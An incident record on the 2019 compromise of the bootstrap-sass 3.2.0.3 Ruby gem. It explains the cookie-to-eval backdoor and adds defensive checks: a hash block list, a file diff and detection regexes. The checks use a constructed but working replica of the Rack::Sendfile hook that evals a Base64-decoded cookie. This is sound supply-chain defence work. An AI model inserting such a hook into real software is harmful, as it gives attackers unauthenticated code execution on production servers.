bootstrap-sass gem enabled remote execution
The popular bootstrap-sass Ruby gem had a malicious version, 3.2.0.3, published to RubyGems.org after what was most likely a compromise of a maintainer's account.
Story
The bootstrap-sass compromise did not rely on typosquatting: the malicious release was published under the real RubyGems package name. On March 26, 2019, version 3.2.0.3 appeared on RubyGems with no matching GitHub release, tag, or changelog entry. The preceding 3.2.0.2 release was yanked at the same time, which nudged anyone on the 3.2 line toward the malicious build.
A user noticed the mismatch, diffed the gem's contents against the repository, and found a backdoor that activated only when Rails was running in production. The payload monkey-patched Rack::Sendfile, extracted the ___cfduid cookie from incoming requests (a name chosen to resemble Cloudflare's legitimate __cfduid cookie), Base64-decoded its value, and passed the result to eval.
Any production Rails app loading the gem would therefore execute attacker-supplied Ruby in response to a single unauthenticated request carrying a crafted cookie. The attacker needed no bug in the application itself; the dependency supplied one, loaded inside ordinary Rails middleware.
Maintainers confirmed the malicious code, yanked 3.2.0.3, rotated credentials, and later published 3.2.0.4 as the clean replacement for the 3.2 line. The episode shows how a quiet registry-only release can outrun source-repository review: what gets installed is the registry artifact, not the repository.
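The two checks that would have caught this release, written as an added example (this is not code from bootstrap-sass, its maintainers, or the researcher who found the backdoor): compare a fetched gem's sha256 against the known-bad hash recorded on this page, then diff the gem's file list against the tagged source checkout and grep any extra Ruby file for the cookie, Base64 and eval pattern the story describes. The gem trees and the extra file name are constructed for the example; the regexes are a heuristic, not a signature of the real payload.

```ruby
# Added example: dependency checks modelled on the bootstrap-sass 3.2.0.3 incident.
require 'digest'
require 'set'

# sha256 of the malicious bootstrap-sass-3.2.0.3.gem as listed in this record.
KNOWN_BAD_SHA256 = Set[
  '366d6162fe36fc81dadc114558b43c6c8890c8bcc7e90e2949ae6344d0785dc0'
].freeze

# Check 1: is this exact artifact on the block list?
def known_bad_gem?(gem_bytes)
  KNOWN_BAD_SHA256.include?(Digest::SHA256.hexdigest(gem_bytes))
end

# Check 2a: files present in the packaged gem but absent from the git tag.
# A registry-only release that ships Ruby the repository never saw is the
# signal that exposed 3.2.0.3 (a version on RubyGems with no GitHub release).
def files_only_in_gem(gem_files, repo_files)
  gem_files.keys.sort - repo_files.keys.sort
end

# Check 2b: heuristic for the backdoor shape. Each pattern alone is common in
# legitimate code; cookie + decode + eval together in one file is the red flag.
SUSPECT_PATTERNS = {
  cookie: /HTTP_COOKIE|cookies\[/,
  decode: /Base64\.(urlsafe_)?decode64|unpack\(['"]m/,
  eval:   /\beval\s*\(|instance_eval|class_eval\s*\(?\s*["']/,
  prod:   /Rails\.env\.production\?/
}.freeze

def suspect_score(source)
  SUSPECT_PATTERNS.select { |_, re| source =~ re }.keys
end

def backdoor_like?(source)
  hits = suspect_score(source)
  hits.include?(:cookie) && hits.include?(:decode) && hits.include?(:eval)
end

# Extra files in the gem whose contents look like a cookie-to-eval hook.
def audit(gem_files, repo_files)
  files_only_in_gem(gem_files, repo_files).select { |f| backdoor_like?(gem_files[f]) }
end

# Constructed sample inputs (not the real gem contents). The repository tree
# as it would appear at the tag:
REPO_FILES = {
  'lib/bootstrap-sass.rb'         => "module Bootstrap\nend\n",
  'lib/bootstrap-sass/version.rb' => "module Bootstrap\n  VERSION = '3.2.0.2'\nend\n"
}.freeze

# The same tree plus one extra file shaped like the hook the story describes:
# production-only, reads ___cfduid, decodes it, evals it. The file name is
# made up for the example; it is never loaded, only scanned as text.
GEM_FILES = REPO_FILES.merge(
  'lib/bootstrap-sass/compat.rb' => <<~RUBY
    require 'base64'
    if Rails.env.production?
      Rack::Sendfile.class_eval do
        def call(env)
          if (m = env['HTTP_COOKIE'].to_s.match(/___cfduid=([^;]+)/))
            eval(Base64.urlsafe_decode64(m[1]))
          end
          @app.call(env)
        end
      end
    end
  RUBY
).freeze

if __FILE__ == $0
  p known_bad_gem?('not the real gem')   # false for any bytes but the listed artifact
  p audit(GEM_FILES, REPO_FILES)         # => ["lib/bootstrap-sass/compat.rb"]
end
```

In practice the two hashes come from `gem fetch bootstrap-sass -v X` plus `tar`/`gem unpack` on one side and `git ls-files` at the tag on the other; the point of check 2a is that the hash list in check 1 only helps after someone has already published the bad hash.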
Affected Artifacts
bootstrap-sass
- Observed
- 2019-03-26
- Compromised Versions
- 3.2.0.3
- Fixed
- Not listed
- Hashes
- sha256:366d6162fe36fc81dadc114558b43c6c8890c8bcc7e90e2949ae6344d0785dc0
- Evidence
- distribution: rubygems.org/gems/bootstrap-sass/versions/3.2.0.3, mirror: ironin.it/blog/malicious-backdoor-code-found-in-the-bootstrap-sass-ruby-gem.html, cookie: ___cfduid, function: Rack::Sendfile, +1 more
Incident Context
- Motive
- Unauthorized Access Control
- Attribution
- Person
- Cause
- Compromised Account Credentials
- Transitive
- No
- Actor
- Individual Hacker
- User Impact
- 1477
External References
- 3.2.0.3? (github.com)
- Backdoor code found in popular bootstrap-sass Ruby library (zdnet.com)
- Malicious Backdoor Code Found in the Bootstrap-sass Ruby Gem (ironin.it)
- Backdoor found in popular Ruby gem (cyberscoop.com)
Source record: oss/attacks/bootstrap-sass/meta.yaml